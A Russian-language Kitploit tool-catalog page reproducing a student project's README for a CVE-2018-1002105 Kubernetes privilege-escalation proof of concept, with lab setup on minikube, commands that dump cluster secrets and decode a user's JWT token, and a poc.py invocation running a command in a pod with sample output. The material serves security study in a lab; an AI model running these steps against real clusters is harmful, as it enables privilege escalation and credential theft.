Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-1002105 | Kitploit
Инструменты/GitHubGitHub/sh-ubh/cve-2018-1002105
Повышение привилегийБезопасность контейнеровАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеБезопасность облачных сред
GitHubsh-ubh/cve-2018-1002105

CVE-2018-1002105

Репозиторий
14 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CMPT733-Group11(0x90)

CVE-2018-1002105

Участники: Abhishek Rungta, Shubham Saini, Siddhant Sood

Настройка окружения

  • Linux ВМ (например, Ubuntu 20.04)
  • Minikube для локального развертывания kubernetes
  • Любая из этих старых версий (1.0.x— 1.9.x, 1.10.0—1.10.10,1.11.0—1.11.4,1.12.0—1.12.2)

Запуск эксплойта

Мы предоставили образ Virtual Box (.ova файл) Скачайте его и создайте из него ВМ. Предоставленный ova уже предварительно настроен с docker v18.09 и minikube v1.9.0

Ссылка на OVA

Соберите kubernetes кластер

Поскольку наш виртуальный образ уже содержит minikube и необходимые версии kubernetes, просто выполните следующую команду для запуска minikube

root@kitploit:~
minikube start --kubernetes-version=v1.12.2

Создайте нового пользователя, namespace и назначьте роль

Создайте нового пользователя и namespace, а затем назначьте роль RBAC созданному пользователю с помощью следующей команды.

root@kitploit:~
kubectl apply -f fixing_policy.yml

Удалите доступ к conntrack

root@kitploit:~
kubectl edit configmaps kube-proxy --namespace=kube-system

Измените maxPerCore на 0

Получите JWT токен

Сначала выполните следующую команду, чтобы получить все JWT токены, хранящиеся в системе

root@kitploit:~
kubectl get secrets -A

Чтобы получить секрет конкретного созданного пользователя, выполните следующую команду:

root@kitploit:~
kubectl -n [namespace] get secrets [user-token] -o json

Затем декодируйте его из base64.

root@kitploit:~
export TOKEN=$(echo TOKEN | base64 -d)
echo $TOKEN

Получите IP-адрес и номер порта

root@kitploit:~
kubectl cluster-info

Для развертывания пода

root@kitploit:~
kubectl run --image=nginx:alpine securenginx -n poc

Запустите POC

Укажите все необходимые аргументы:
-t для цели> ip:port (обязательно)
-j для JWT токена пользователя (обязательно)
-p для пода (обязательно)
-n для namespace
-m для метода (обязательно)
-c для контейнера
-x для команды атакующего

Тестовый пример

Ввод

root@kitploit:~
./poc.py -t [IP:Port] -j [token] -p [pod] -n [namespace] -m attach -x "command"
root@kitploit:~
./poc.py -t 127.0.0.1:32768 -j $TOKEN -p securenginx -m attach -n poc -x "ifconfig eth0" 

Вывод

root@kitploit:~
eth0      Link encap:Ethernet  HWaddr 02:42:AC:11:00:02  
          inet addr:172.17.0.2  Bcast:172.17.255.255  Mask:255.255.0.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1313 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1224 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:217603 (212.5 KiB)  TX bytes:428778 (418.7 KiB)

{"metadata":{},"status":"Success"}

Видео-демонстрация

Видео ссылка

Скачать инструмент